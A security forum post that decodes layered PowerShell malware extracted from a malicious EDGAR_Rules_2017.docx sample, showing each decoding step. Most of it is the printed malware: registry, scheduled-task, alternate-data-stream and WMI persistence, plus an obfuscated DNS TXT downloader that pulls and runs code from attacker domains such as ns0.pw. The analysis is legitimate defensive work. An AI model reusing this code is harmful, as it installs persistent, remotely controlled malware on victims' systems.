Decoding scripts from EDGAR_Rules_2017.docx (Special Samples: 2 Malware Without Macros)

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,513
The malware was analyzed here:
Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'EDGAR_Rules_2017.docx'
.
So, I looked at the 'Extracted Strings' section of the above analysis and found an interesting string:
Code:
$data=[System.Convert]::FromBase64String('H4sIAAAAAAAEANVZ...NU9miIAAA==');
$ms=New-Object System.IO.MemoryStream;
$ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;
$cs=New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);
$sr=New-Object System.IO.StreamReader($cs);
IEX($sr.readtoend())
.
First I simply thought that the long string 'H4sIAAAAAAAEANVZ...NU9miIAAA==' could be decoded by a plain Base64 decoder, but it failed. So, I looked at the end:
Code:
$ms.Seek(0,0)|Out-Null;$cs=New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);
$sr=New-Object System.IO.StreamReader($cs);IEX($sr.readtoend())
.
Was the long string compressed by GZip? If so, then it could be decompressed by the initial code, slightly modified (without IEX at the end):
Code:
$data=[System.Convert]::FromBase64String('H4sIAAAAAAAEANVZ...NU9miIAAA==');
$ms=New-Object System.IO.MemoryStream;
$ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;
$cs=New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);
$sr=New-Object System.IO.StreamReader($cs);
$sr.ReadToEnd()   # print the decompressed script instead of executing it with IEX
.
Voila, it worked. Here is a decoded part:
Code:
$ServiceCode = @'
$data=[System.Convert]::FromBase64String('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');$ms
=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.Seek(0,0);$cs=New-Object System.IO.Compression.GZ
ipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);$sr=New-Object System.IO.StreamReader($cs);IEX $sr.rea
dtoend();
'@
$stgBytes = [System.Text.Encoding]::Unicode.GetBytes($ServiceCode)
$stgB64 =[Convert]::ToBase64String($stgBytes)
New-ItemProperty -Path 'HKCU:\Control Panel\Desktop' -Name 'IE' -Value $stgB64 -force
$stagerCode = @'
$b64=(Get-ItemProperty -Path 'HKCU:\Control Panel\Desktop').IE;$stCode=[System.Text.Encoding]::Unicode.GetString([System
.Convert]::FromBase64String($b64));[System.Threading.Mutex]$m;[bool]$mtmp=$false;$m=New-Object System.Threading.Mutex($t
rue, [string]1823821749, [ref] $mtmp);if(!$mtmp){exit;}IEX $stCode;
'@
$eCmd = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($stagerCode))
try{New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'IE' -Value "powershell.exe -ep b
ypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'IE' -Value "powershell.exe -
ep bypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServices' -Name 'IE' -Value "powershell.e
xe -ep bypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion' -Name 'IE' -Value "powershell.exe -ep bypas
s -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'IE' -Value "powershell.exe -ep b
ypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
New-ItemProperty -Path 'HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'IE' -Value "powershell
.exe -ep bypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'IE' -Value "powershell.e
xe -ep bypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Services\VxD' -Name 'IE' -Value "powershell.exe -ep bypass -n
oni -w hidden -e $eCmd" -force
} catch{}
try{New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
New-ItemProperty -Path 'HKCR:\vbsfile\shell\open\command' -Name 'IE' -Value "powershell.exe -ep bypass -noni -w hidden -
e $eCmd" -force
} catch{}
function Invoke-PrepareScheduledTask
{ $taskName = 'IE'
 $task = Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue
 if ($task -ne $null)
 {  Unregister-ScheduledTask -TaskName $taskName -Confirm:$false
 }
 $action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument "-ep bypass -noni -w hidden -e $eCmd"
 $trigger = New-ScheduledTaskTrigger -AtStartup -RandomDelay 00:00:30
 $settings = New-ScheduledTaskSettingsSet -Compatibility Win8
 $principal = New-ScheduledTaskPrincipal -UserId SYSTEM -LogonType ServiceAccount -RunLevel Highest
 $definition = New-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -Descriptio
n "Run $($taskName) at startup"
 Register-ScheduledTask -TaskName $taskName -InputObject $definition
 $task = Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue
 $psVersion = [convert]::ToInt32($($PSVersionTable.PSVersion.Major|Out-String).Trim())
 $adsDir = $env:programdata + '\Windows'
 $adsModuleName = 'kernel32.dll'
 if ($psVersion -gt 2)
 {  Set-Content -Path $adsDir -Value $ServiceCode -Stream 'kernel32.dll'
 }
 $currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
 if ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
 {
  $filterName = 'kernel32_Filter';
  $consumerName = 'kernel32_Consumer';

  Get-WmiObject __eventFilter -namespace root\subscription | Remove-WmiObject
  Get-WmiObject CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
  Get-WmiObject __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject
  $filterResult = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace 'root\subscription' -Class __EventFilter -A
rguments @{Name = $filterName; EventNamespace = 'root\CIMV2'; QueryLanguage = 'WQL'; Query = "Select * from __InstanceCr
eationEvent within 30 where targetInstance isa 'Win32_LogonSession'"}
  if ($psVersion -gt 2)
  {$encCmd = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX `$(Get-Content -Path $adsDir -Strea
m $adsModuleName|Out-String)"))
  Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace 'root\subscription' -Class CommandLineEventConsumer -Argume
nts @{Name = $consumerName; ExecutablePath = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLineTem
plate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noni -w hidden -e $encCmd "}
  }
 }
 if ($task -ne $null)
 {  Write-Output "Created scheduled task: '$($task.ToString())'."
 }
 else
 {  Write-Output 'Created scheduled task: FAILED.'
 }}
Invoke-PrepareScheduledTask
IEX $stagerCode
.
The first decoded fragment was encoded in the same way as the initial code, so I did the same trick to see:
Code:
0
${_/\____/\/==\____} = 100
function Download-Big-TXT
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]$DomainList, [Parameter(ValueFromPipeline=$True)]${___/\/\/\
__/==\_/=});
${_/\____/\/\__/\/=} = '';
${_/\/\/=\____/====} = _/===\/\/\/======\ $DomainList;
${/==\/\____/=\/\/\} = 0;
${_/===\_/=\___/\/\_} = "$(_/===\/\__/\_/\_/=).${___/\/\/\__/==\_/=}.${/==\/\____/=\/\/\}.${_/\/\/=\____/====}";
${__/\/==\/\/\_____} = _/==\/\_/\__/\/=== ${_/===\_/=\___/\/\_};
if (${__/\/==\/\/\_____} -eq 0) { return 0
}
while (${__/\/==\/\/\_____} -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAuADAALgAwAC4AMAA=')
)))
{ Write-Host $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String
('SQBwADoAIAAkAHsAXwBfAC8AXAAvAD0APQBcAC8AXAAvAFwAXwBfAF8AXwBfAH0A')));
 ${_/====\/=\/\/=\/=} = ___/=\___/====\__/ ${__/\/==\/\/\_____};
 ${___/\/\/\_/=\__/\} = _/=\/=\/\/====\__/ ${_/====\/=\/\/=\/=};
 Write-Host ${___/\/\/\_/=\__/\};
 ${/==\/\/\_/\___/=\} = (_/=\___/==\/=\/\/\ ${_/===\_/=\___/\/\_}) -join '';
 if (${/==\/\/\_/\___/=\} -eq 0) {  return 0
 }
 ${_/\_/\_/\/\/===\/} = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;
 ${/=====\_/\___/\__} = (${_/\_/\_/\/\/===\/}.ComputeHash([system.Text.Encoding]::UTF8.GetBytes(${/==\/\/\_/\___/=\})) |
 foreach{$_.ToString("X2") }) -join "";
 ${/=\/=====\/\_/\_/} = ___/==\_____/==\/\ ${/=====\_/\___/\__}.Substring(0, 8) | _/=\/=\/\/====\__/; if([string]${___/\
/\/\_/=\__/\} -eq [string]${/=\/=====\/\_/\_/})
 { ${_/\____/\/\__/\/=} += ${/==\/\/\_/\___/=\};
 ${_/\/\/=\____/====} = _/===\/\/\/======\ $DomainList;
 ${/==\/\____/=\/\/\}++;
 }
 ${_/===\_/=\___/\/\_} = "$(_/===\/\__/\_/\_/=).${___/\/\/\__/==\_/=}.${/==\/\____/=\/\/\}.${_/\/\/=\____/====}";
 ${__/\/==\/\/\_____} = _/==\/\_/\__/\/=== ${_/===\_/=\___/\/\_};
 if (${__/\/==\/\/\_____} -eq 0) {  return 0
 }}
return [string]${_/\____/\/\__/\/=};
}
function _/===\/\/\/======\
{param([array]$DomainList)
if($DomainList.count -eq 1)
{ return $DomainList;
}
return $DomainList[(Get-Random -Maximum ([array]$DomainList).count)];
}
function _/===\/\__/\_/\_/=()
{${/=\/==\/=\/\/\/=\} = gwmi Win32_BIOS | Select -ExpandProperty SerialNumber ;
${_/\_/\_/\/\/===\/} = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;
${/=====\_/\___/\__} = (${_/\_/\_/\/\/===\/}.ComputeHash([system.Text.Encoding]::UTF8.GetBytes(${/=\/==\/=\/\/\/=\})) |
%{$_.ToString("X2") }) -join "";
return ${/=====\_/\___/\__}.Substring(0, 10);
}
function ___/\/\/==\/\____/
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)][array]$DomainList, [scriptblock]${__/===\___/\_/=\__});
if((-not $DomainList) -or ($DomainList.count -eq 0))
{ Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAZABvAG0AYQBpAG4AcwA=')));
}
 ${_/\/\/=\____/====} = _/===\/\/\/======\ $DomainList;
try
{ return &${__/===\___/\_/=\__} -Domain ${_/\/\/=\____/====};
}
catch
{ Write-Debug $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64Strin
g('RQByAHIAbwByADoAIAAkAGUAcgByAG8AcgA=')));
 return ___/\/\/==\/\____/ ([array]($DomainList | ? {$_ -ne ${_/\/\/=\____/====} })) ${__/===\___/\_/=\__};
}}
function _/==\/\_/\__/\/===
{[CmdletBinding()] param([Parameter()]${_/===\_/=\___/\/\_});
Write-Debug $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(
'WwBEAE4AUwBdACAAKABBACkAIAA9AD0APgAgACQAewBfAC8APQA9AD0AXABfAC8APQBcAF8AXwBfAC8AXAAvAFwAXwB9AA==')));
${_/\/\/=\_/\/\/=\_} = nslookup -type=a ${_/===\_/=\___/\/\_} 2>&1;
${__/\_/\__/\/\/==\} = [regex] $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]
::FromBase64String('XABzACoAJAB7AF8ALwA9AD0APQBcAF8ALwA9AFwAXwBfAF8ALwBcAC8AXABfAH0AKAAuAGwAbwBjAGEAbABkAG8AbQBhAGkAbgAp
ACoAXABzACoAQQBkAGQAcgBlAHMAcwAoAGUAcwApACoAOgBcAHMAKgAoAFsAXABkAFwALgBdACoAKQA=')));
${/====\__/\_/=\___} = ${__/\_/\__/\/\/==\}.Match(${_/\/\/=\_/\/\/=\_});
${_/=\/==\/\____/=\} = 0
while ((-not ${/====\__/\_/=\___}.Success) -and (${_/\____/\/==\____} -ne ${_/=\/==\/\____/=\})){ sleep -s 5
 ${_/=\/==\/\____/=\} = ${_/=\/==\/\____/=\} + 1
 ${_/\/\/=\_/\/\/=\_} = nslookup -type=a ${_/===\_/=\___/\/\_} 2>&1;
 ${__/\_/\__/\/\/==\} = [regex] $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert
]::FromBase64String('XABzACoAJAB7AF8ALwA9AD0APQBcAF8ALwA9AFwAXwBfAF8ALwBcAC8AXABfAH0AKAAuAGwAbwBjAGEAbABkAG8AbQBhAGkAbgA
pACoAXABzACoAQQBkAGQAcgBlAHMAcwAoAGUAcwApACoAOgBcAHMAKgAoAFsAXABkAFwALgBdACoAKQA=')));
 ${/====\__/\_/=\___} = ${__/\_/\__/\/\/==\}.Match(${_/\/\/=\_/\/\/=\_});
}
if (-not ${/====\__/\_/=\___}.Success) { return 0
}
return ${/====\__/\_/=\___}.Groups[3].Value;
}
function _/=\___/==\/=\/\/\
{[CmdletBinding()]param([Parameter()]${_/===\_/=\___/\/\_});
Write-Debug $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(
'WwBEAE4AUwBdACAAKABUAFgAVAApACAAPQA9AD4AIAAkAHsAXwAvAD0APQA9AFwAXwAvAD0AXABfAF8AXwAvAFwALwBcAF8AfQA=')));
${_/\/\/=\_/\/\/=\_} = nslookup -type=txt ${_/===\_/=\___/\/\_} 2>&1;
${__/\_/\__/\/\/==\} = [regex] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KAAiAFsAXgBcAHMAXQAqACI
AXABzACoAKQArAA==')));
${/==\/=\/===\/==\_} = ${__/\_/\__/\/\/==\}.Matches(${_/\/\/=\_/\/\/=\_});
${_/=\/==\/\____/=\} = 0
while ((${/==\/=\/===\/==\_}.count -eq 0) -and (${_/\____/\/==\____} -ne ${_/=\/==\/\____/=\})){ sleep -s 5
 ${_/=\/==\/\____/=\} = ${_/=\/==\/\____/=\} + 1
 ${_/\/\/=\_/\/\/=\_} = nslookup -type=txt ${_/===\_/=\___/\/\_} 2>&1;
 ${__/\_/\__/\/\/==\} = [regex] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KAAiAFsAXgBcAHMAXQAqAC
IAXABzACoAKQArAA==')));
 ${/==\/=\/===\/==\_} = ${__/\_/\__/\/\/==\}.Matches(${_/\/\/=\_/\/\/=\_});
}
if (${/==\/=\/===\/==\_}.count -eq 0) { return 0
}
return (${__/\_/\__/\/\/==\}.Matches(${_/\/\/=\_/\/\/=\_}) | Select -ExpandProperty Value) -join '' -replace '"' -replac
e '`n' -replace ' ';
}
function _/==\_/\_/=\/=\___
{[CmdletBinding()]Param ([Parameter(Mandatory=$True,ValueFromPipeline=$True,ValueFromPipelineByPropertyName=$True)][byte
[]] $byteArray = $(Throw($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LQBiAHkAdABlAEEAcgByAGEAeQAgA
GkAcwAgAHIAZQBxAHUAaQByAGUAZAA='))))))
Process
{ ${/=\/\_/==\_/==\__} = New-Object System.IO.MemoryStream;
 ${/=\/\_/==\_/==\__}.Write($byteArray, 0, $byteArray.Length);
 $null = ${/=\/\_/==\_/==\__}.Seek(0,0);
 ${/======\_/=\__/=\} = New-Object System.IO.Compression.GZipStream(${/=\/\_/==\_/==\__}, [System.IO.Compression.Compres
sionMode]::Decompress);
 ${_/\___/==\/\/==\_} = New-Object System.IO.MemoryStream;
 ${_/\/===\/==\/\__/} = New-Object System.IO.StreamReader(${/======\_/=\__/=\}, [system.Text.Encoding]::UTF8);
 echo ${_/\/===\/==\/\__/}.readtoend();
}}
function _/==\_/\/=\__/=\_/
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]${_/====\/\/=\___/\/});
if (${_/====\/\/=\___/\/} -eq 0) { return 0
}
${__/\__/==\/\/====} = [System.Convert]::FromBase64String(${_/====\/\/=\___/\/});
return _/==\_/\_/=\/=\___(${__/\__/==\/\/====});
}
function Get-Stage-PS
{[CmdletBinding()]param([Parameter()]$DomainList);
return ___/\/\/==\/\____/ $DomainList
{return _/=\___/==\/=\/\/\ "$(_/===\/\__/\_/\_/=).stage.${_/\/\/=\____/====}" | _/==\_/\/=\__/=\_/; };};
function ___/\_____/====\__
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]$DomainList);
return Download-Big-TXT $DomainList $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAZwBlAA==')
)) | _/==\_/\/=\__/=\_/;
}
function ___/==\_____/==\/\
{[CmdletBinding()] param([Parameter(ValueFromPipeline=$True)]${__/=\/==\_/=\/\___});
${_/\/==\_/\_/\/\_/} = @{ '0' = 0;
 '1' = 1;
 '2' = 2;
 '3' = 3;
 '4' = 4;
 '5' = 5;
 '6' = 6;
 '7' = 7;
 '8' = 8;
 '9' = 9;
 'A' = 10;
 'B' = 11;
 'C' = 12;
 'D' = 13;
 'E' = 14;
 'F' = 15;
};
${/=\/==\/=====\/=\} = "${__/=\/==\_/=\/\___}".Length;
${_/===\_/\/\/\__/=} = ${/=\/==\/=====\/=\};
[uint64]${/==\/==\__/=\/\__} = 0;
while (${/=\/==\/=====\/=\} -ne 0)
{ ${/=\/==\/=====\/=\}--;
 ${___/=\/\_/=\/====} = ${_/\/==\_/\_/\/\_/}[[string]${__/=\/==\_/=\/\___}[${/=\/==\/=====\/=\}]];
 ${_/=====\/=\/\__/\} = _/=====\_/\/====== 16 (${_/===\_/\/\/\__/=} - ${/=\/==\/=====\/=\} - 1);
 ${/==\/==\__/=\/\__} += [uint64]([uint64]${___/=\/\_/=\/====} * [uint64]${_/=====\/=\/\__/\});
}
return ${/==\/==\__/=\/\__};
}
function _/=====\_/\/======
{[CmdletBinding()] param([Parameter(ValueFromPipeline=$True)]${__/\/=\/==\/\/\/=\}, [Parameter(ValueFromPipeline=$True)]
${_/=\_/==\___/\__/\});
return [Math]::Pow(${__/\/=\/==\/\/\/=\}, ${_/=\_/==\___/\__/\});
}
function _/=\/=\/\/====\__/
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]${_/==\__/\_/====\_/});
return [convert]::ToString(${_/==\__/\_/====\_/},2);
}
function ___/=\___/====\__/
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]${___/=====\/=\/\_/\});
${_/\/\_/=====\___/} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBa
se64String('JAB7AF8AXwBfAC8APQA9AD0APQA9AFwALwA9AFwALwBcAF8ALwBcAH0A'))).Split(".");
${/=\/=\_/=\___/\__} = [uint64]([uint64]${_/\/\_/=====\___/}[0] * 16777216);
${_/=\__/=\/\/\/\__} = [uint64]([uint64]${_/\/\_/=====\___/}[1] * 65536);
${_/=\/=\/\____/==\} = [uint64]([uint64]${_/\/\_/=====\___/}[2] * 256);
${_/\/=\_/=\__/=\/=} = ${_/\/\_/=====\___/}[3];
${/=\_/\__/\/=\___/} = ${/=\/=\_/=\___/\__} + ${_/=\__/=\/\/\/\__} + ${_/=\/=\/\____/==\} + ${_/\/=\_/=\__/=\/=};
return ${/=\_/\__/\/=\___/};
}
function Int-To-Ip
{[CmdletBinding()] param([Parameter(ValueFromPipeline=$True)]$uint);
${/=\/=\_/=\___/\__} = [uint64]([uint64]$uint / 16777216) % 256;
${_/=\__/=\/\/\/\__} = [uint64]([uint64]$uint / 65536) % 256;
${_/=\/=\/\____/==\} = [uint64]([uint64]$uint / 256) % 256;
${_/\/=\_/=\__/=\/=} = [uint64]([uint64]$uint) % 256;
return [string]${/=\/=\_/=\___/\__} + '.' + [string]${_/=\__/=\/\/\/\__} + '.' + [string]${_/=\/=\/\____/==\} + '.' + [s
tring]${_/\/=\_/=\__/=\/=};
}
${__/\/\/========\/} = @($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBwAHcA'))),$([Text.
Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBzAGkAdABlAA=='))),$([Text.Encoding]::Unicode.GetStr
ing([Convert]::FromBase64String('bgBzADAALgBzAHAAYQBjAGUA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64
String('bgBzADAALgB3AGUAYgBzAGkAdABlAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADEAL
gBwAHIAZQBzAHMA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADEALgB3AGUAYgBzAGkAdABlAA==')
)),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADIALgBwAHIAZQBzAHMA'))),$([Text.Encoding]::Uni
code.GetString([Convert]::FromBase64String('bgBzADMALgBzAGkAdABlAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]:
:FromBase64String('bgBzADMALgBzAHAAYQBjAGUA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzAD
QALgBzAGkAdABlAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADQALgBzAHAAYQBjAGUA'))),$(
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADUALgBiAGkAegA='))),$([Text.Encoding]::Unicode.GetS
tring([Convert]::FromBase64String('bgBzADUALgBvAG4AbABpAG4AZQA='))),$([Text.Encoding]::Unicode.GetString([Convert]::From
Base64String('bgBzADUALgBwAHcA'))));
try
{${_/\____/\/\__/\/=} = ___/\_____/====\__(${__/\/\/========\/}); iex ${_/\____/\/\__/\/=};
}
catch
{Write-Debug $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBNAGEAaQBuAF0AIABHAGUAbgBlAHIAYQBsACAAZ
gBhAGkAbAB1AHIAZQA=')));
Write-Host $Error[0];
}
.
There are still some encoded strings left, but they can be simply decoded by using the commands from the above source code, for example:
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBwAHcA')) -> ns0.pw
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBzAGkAdABlAA==')) -> ns0.site
